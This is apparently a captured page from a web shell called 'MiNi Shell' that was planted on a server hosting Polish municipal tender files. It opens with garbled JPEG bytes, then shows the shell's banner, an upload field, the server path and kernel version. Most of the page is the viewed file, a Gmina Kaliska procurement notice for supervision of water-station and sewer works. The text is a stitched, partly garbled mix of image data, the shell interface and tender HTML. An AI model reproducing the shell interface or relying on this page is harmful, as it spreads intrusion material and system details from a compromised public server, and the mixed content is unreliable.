JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230223/0010774001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego : 1. Moder. Stacji Wodociągowej w Cieciorce i Przepompowni ścieków PS-3 wraz z budową nowych sieci wodno-kanalizacyjnych 2. Modernizacja Stacji wodociągowej w Piecach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kaliska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675698</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowowiejska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kaliska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-260</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">585889201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kaliska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kaliska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego : 1. Moder. Stacji Wodociągowej w Cieciorce i Przepompowni ścieków PS-3 wraz z budową nowych sieci wodno-kanalizacyjnych 2. Modernizacja Stacji wodociągowej w Piecach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-02049db1-b36c-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00107740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00019675/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Pełnienie funkcji inspektora nadzoru dla zadania : Modernizacja Stacji Wodociągowej w Cieciorce i Przepompowni ścieków PS-3 wraz z budową nowych sieci wodno-kanalizacyjnych w Gminie Kaliska</p> <p class="mb-0">1.3.2 Pełnienie funkcji inspektora nadzoru dla zadania : Modernizacja Stacji wodociągowej w Piecach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kaliska <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://www.platformazakupowa.pl/pn/kaliskaW celu skrócenia czasu udzielenia odpowiedzi na pytania<br/>preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem<br/>https://platformazakupowa.pl/pn/kaliska (po wyszukaniu odpowiedniego postępowania) poprzez<br/>kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że<br/>wiadomość została wysłana do Zamawiającego. Z uwagi na ograniczenie ilości znaków w niniejszym<br/>ogłoszeniu Szczegółowe warunki opisane zostały w SWZ !!Zamawiający będzie kontaktował się z<br/>Wykonawcami za pomocą : https://www.platformazakupowa.pl/pn/kaliska</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał Wykonawcom informacje za<br/>pośrednictwemhttps://platformazakupowa.pl/pn/kaliska. Informacje dotyczące odpowiedzi na<br/>pytania,zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi<br/>przepisami<br/>adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem<br/>https://platformazakupowa.pl/pn/kaliska do konkretnego Wykonawcy.Wykonawca jako podmiot<br/>profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na https://platformazakupowa.pl/pn/kaliska<br/>przesłanych przez Zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.Oferta, wniosek oraz przedmiotowe<br/>środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane<br/>elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W<br/>procesie<br/>składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis<br/>zaufany lub podpis osobisty Wykonawca składa bezpośrednio na<br/>dokumencie, który następnie przesyła do systemu.W przypadku wykorzystania formatu podpisu<br/>XAdES<br/>zewnętrzny, Zamawiający wymaga dołączenia odpowiedniej ilości plików, tj. podpisywanych plików z<br/>danymi oraz plików XAdES.Zgodnie z art. 18 ust. 3 PZP, nie ujawnia się informacji stanowiących<br/>tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli Wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one<br/>udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone<br/>informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje<br/>się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę<br/>przedsiębiorstwa.Wykonawca, za pośrednictwem https://platformazakupowa.pl/pn/kaliska może przed<br/>upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub<br/>wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. Każdy z Wykonawców może złożyć tylko jedną<br/>ofertę. Złożenie większej liczby ofert lub oferty zawierającej propozycje wariantowe podlegać będzie<br/>odrzuceniu.Ceny oferty muszą zawierać wszystkie koszty, jakie musi ponieść Wykonawca, aby<br/>zrealizować zamówienie z najwyższą starannością oraz ewentualne rabaty.Zamawiający rekomenduje<br/>wykorzystanie formatów: .pdf, .doc, .docx, .xls, .xlsx, .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>rozszerzeń:.zip,.7Z.Wśród rozszerzeń powszechnych, a niewystępujących w Rozporządzeniu KRI<br/>występują: .rar, .gif, .bmp, .numbers, .pages. Dokumenty złożone w takich plikach zostaną uznane za<br/>złożone nieskutecznie.Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych<br/>profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików<br/>podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi<br/>maksymalnie 5MB.<br/>Z uwagi na ograniczenie ilości znaków w niniejszym ogłoszeniu Szczegółowe warunki opisane zostały w SWZ !!</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani / Pana danych osobowych<br/>jest Gmina Kaliska reprezentowana przez Wójta Gminy Kaliska z siedzibą w Kaliskach, ul.<br/>Nowowiejska<br/>2, 83-260 Kaliska;2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się pod<br/>adresem e – mail: iod@kaliska.pl, 3) Pani / Pana dane osobowe przetwarzane będą na podstawie art. 6<br/>ust. 1 lit. C RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie podstawowym bez negocjacji (art. 275 ust. 1 ustawy PZP),4)<br/>odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy PZP,5) Pani / Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy,6) obowiązek podania przez Panią / Pana danych<br/>osobowych bezpośrednio Pani / Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego,7) w odniesieniu do Pani / Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO,8) posiada Pani / Pan:a) na podstawie art. 15<br/>RODO prawo dostępu do danych osobowych Pani / Pana dotyczących (w przypadku, gdy skorzystanie<br/>z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani<br/>/ Pan zobowiązania do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia),b)<br/>na podstawie art. 16 RODO prawo do sprostowania Pani / Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników),c) na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania<br/>postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w<br/>art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej<br/>lub państwa członkowskiego),d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani / Pan, że przetwarzanie danych osobowych Pani / Pana dotyczących<br/>narusza przepisy RODO,9) nie przysługuje Pani / Panu:a) w związku z art. 17 ust. 3 lit b, d lub e RODO<br/>prawo do usunięcia danych osobowych,b) prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,c) na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani / Pana danych osobowych jest art. 6 ust. 1 lit. C<br/>RODO,10) przysługuje Pani / Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani / Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem niniejszego zamówienia jest świadczenie usług nadzoru inwestorskiego dla inwestycji:<br/>1) Modernizacja Stacji Wodociągowej w Cieciorce i Przepompowni ścieków PS-3 wraz z budową nowych sieci wodno-kanalizacyjnych w Gminie Kaliska. <br/>Zamawiający dokonuje podziału zamówienia na dwie części oraz dopuszcza składanie ofert częściowych, na jedną lub dwie części zamówienia.<br/>Zakres rzeczowy zamówienia obejmuje:<br/>Część 1: Pełnienie nadzoru inwestorskiego nad realizacją inwestycji obejmującej Modernizację Stacji Wodociągowej w Cieciorce i Przepompowni ścieków PS-3 wraz z budową nowych sieci wodno-kanalizacyjnych w Gminie Kaliska, składającej się z pięciu zadań:<br/>1) Zadanie nr 1 „Budowa nowej sieci wodociągowo-kanalizacyjnej przy ul. Krętej w miejscowości Frank”.<br/>2) Zadanie nr 2 „Modernizacja Stacji Wodociągowej w Cieciorce”.<br/>3) Zadanie nr 3 „Budowa nowej sieci wodociągowo-kanalizacyjnej przy ul. Firmowej w miejscowości Kaliska”.<br/>4) Zadanie nr 4 „Budowa nowej sieci kanalizacji sanitarnej przy ul. Dworcowej w miejscowości Kaliska”.<br/>5) Zadanie nr 5 „Modernizacja Przepompowni ścieków PS-3 na ul. Przemysłowej w miejscowości Kaliska”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71318000-0 - Inżynieryjne usługi doradcze i konsultacyjne</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Przy wyborze oferty Zamawiający kierował się będzie następującymi kryteriami oceny ofert i ich wagą (dla każdej z części):<br/>KRYTERIUM WAGA %<br/>A<br/>Liczba punktów uzyskanych w kryterium<br/>– cena oferty<br/>60<br/>B<br/>Liczba punktów uzyskanych w kryterium<br/>– doświadczenie inspektora nadzoru robót instalacyjnych sanitarnych<br/>20<br/>C<br/>Liczba punktów uzyskanych w kryterium<br/>– doświadczenie inspektora nadzoru robót konstrukcyjno-budowlanych<br/>20<br/>LP<br/>Liczba wszystkich punktów uzyskanych przez ofertę badaną<br/>100<br/>Zamawiający udzieli zamówienia Wykonawcy, który złożył najkorzystniejszą z największą ilością uzyskanych punktów ofertę obejmującą realizację zamówienia, stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów udzielenia zamówienia na podstawie poniższego wzoru:<br/>LP = A + B + C<br/>ZP.271.2.2023<br/>Strona25<br/>Kryterium - /A/<br/>CENA OFERTY – waga 60%<br/>Kryterium „cena oferty” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu ofertowym (Załącznik nr 1a/1b do SWZ).<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru.<br/>*najniższa cena brutto w złotych spośród ofert niepodlegających odrzuceniu i złożonych przez Wykonawców, którzy nie podlegali wykluczeniu w danym etapie badania i oceny ofert.<br/>Kryterium - /B/<br/>DOŚWIADCZENIE INSPEKTORA NADZORU ROBÓT INSTALACYJNYCH SANITARNYCH - waga 20%<br/>Kryterium „doświadczenie inspektora nadzoru robót instalacyjnych sanitarnych” na przedmiot zamówienia będzie rozpatrywane na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym (Załącznik nr 1a/1b do SWZ).<br/>Kryterium - /C/<br/>DOŚWIADCZENIE INSPEKTORA NADZORU ROBÓT KONSTRUKCYJNO-BUDOWLANYCH - waga 20%<br/>Kryterium „doświadczenie inspektora nadzoru robót konstrukcyjno-budowlanych” na przedmiot zamówienia będzie rozpatrywane na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym (Załącznik nr 1a/1b do SWZ).<br/>najniższa cena*<br/>Cena /A/ = --------------------------------- x 60<br/>cena badanej oferty<br/>Doświadczenie<br/>1 budowa<br/>2 budowy<br/>3 budowy (lub więcej)<br/>Przyznane:<br/>0 punktów<br/>10 punktów<br/>20 punktów<br/>ZP.271.2.2023<br/>Strona26<br/>UWAGA:<br/>− Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans Kryterium „Cena” i „Doświadczenie z kryterium B i C”, Zamawiający spośród tych ofert wybiera ofertę z najniższa ceną.<br/>− W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>− Wyniki poszczególnych działań matematycznych będą zaokrąglane do dwóch miejsc po przecinku lub z większą dokładnością, jeżeli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów.<br/>− Oferta może uzyskać maksymalnie 100 punktów.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/><br/>Z uwagi na ograniczoną ilość znaków pełen opis znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba punktów uzyskanych w kryterium – doświadczenie inspektora nadzoru robót instalacyjnych sanitarnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba punktów uzyskanych w kryterium – doświadczenie inspektora nadzoru robót konstrukcyjno-budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć 2: Pełnienie nadzoru inwestorskiego nad realizacją inwestycji obejmującej Modernizację Stacji wodociągowej w Piecach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71318000-0 - Inżynieryjne usługi doradcze i konsultacyjne</p> <p class="mb-0">71540000-5 - Usługi 